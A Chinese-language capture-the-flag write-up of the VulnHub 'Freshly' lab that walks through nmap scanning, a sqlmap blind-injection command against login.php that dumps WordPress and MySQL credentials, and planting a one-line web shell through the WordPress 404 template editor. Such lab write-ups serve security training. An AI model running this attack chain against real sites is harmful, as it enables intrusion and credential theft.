NEKO

vulnhub-Freshly

2018/07/26

主机扫描

1
netdiscover -r 10.10.10.0/24  (同一个局域网内)

或者

1
nmap -sP 10.10.10.0/24

确认主机ip:10.10.10.188

服务扫描

1
nmap -sS -Pn -T4  10.10.10.188

3个服务:

1
2
3
80/tcp   open  http
443/tcp open https
8080/tcp open http-proxy

对端口进行详细探测

1
nmap -A -O -p80,443,8080 10.10.10.188
1
2
3
4
5
6
7
8
9
10
11
12
13
PORT     STATE SERVICE  VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-02-17T03:30:05
|_Not valid after: 2025-02-14T03:30:05
8080/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).

80端口http服务.
443端口发现wordpress.
8080端口上不去.

扫描目录

1
python3 dirsearch.py -u http://10.10.10.188/ -e *

发现/login.php,/phpmyadmin页面

拖库

在login.php页面简单测试发现user参数存在时间盲注和布尔盲注,sqlmap跑一下.

1
sqlmap -u "http://10.10.10.188/login.php" --data "user=admin&password=123&s=Submit" -p "user" --level 3

然而sqlmap只检测出来延时注入??

wordpress后台用户密码:

1
2
3
4
5
+----------+---------------------+
| username | password |
+----------+---------------------+
| admin | SuperSecretPassword |
+----------+---------------------+

mysql用户密码:

1
2
root
060C1AFC38904259EBAF6362307E3C5BAADE7141(SuperSecretPassword)

getshell

进入wordpress后台->左上角图标->aboutwordpress->版本号:WordPress 4.1.24
或者主页面源码找到:

1
<meta name="generator" content="WordPress 4.1.24"/>

外观->编辑->编辑404模板->写入一句话

蚁剑连https需要设代理,
菜刀可以直接连上.
最后在/etc/password中发现flag

原文作者: n3k0

发表日期: July 26th 2018, 11:47:28

发出嘶吼: 没有魔夜2玩我要死了

CATALOG
  1. 1. 主机扫描
  2. 2. 服务扫描
  3. 3. 对端口进行详细探测
  4. 4. 扫描目录
  5. 5. 拖库
  6. 6. getshell